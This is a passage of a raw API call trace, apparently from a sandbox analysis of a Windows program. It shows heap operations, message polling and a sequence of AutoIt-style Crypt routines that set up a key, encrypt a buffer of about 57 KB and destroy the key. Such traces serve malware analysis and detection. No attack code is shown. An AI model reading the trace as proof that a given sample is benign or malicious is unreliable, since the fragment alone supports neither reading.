hHeap=0x8a0000) returned 1 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.945] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.945] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27b8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27b8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.947] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.948] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.948] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.949] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.949] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.949] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.949] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.950] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xdf62, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xdf70) returned 1 [0184.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.950] CharLowerBuffW (in: lpsz="byte[57201]", cchLength=0xb | out: lpsz="byte[57201]") returned 0xb [0184.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.952] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.952] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.952] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6cf78*, pdwDataLen=0x87e820*=0xdf62, dwBufLen=0xdf70 | out: pbData=0xa6cf78*, pdwDataLen=0x87e820*=0xdf70) returned 1 [0184.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.954] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.954] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.954] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.954] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.954] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.963] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.963] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.963] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.963] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.963] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0184.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.963] CryptDestroyKey (hKey=0x90aed8) returned 1 [0184.963] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.963] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.963] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.963] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.963] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.964] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 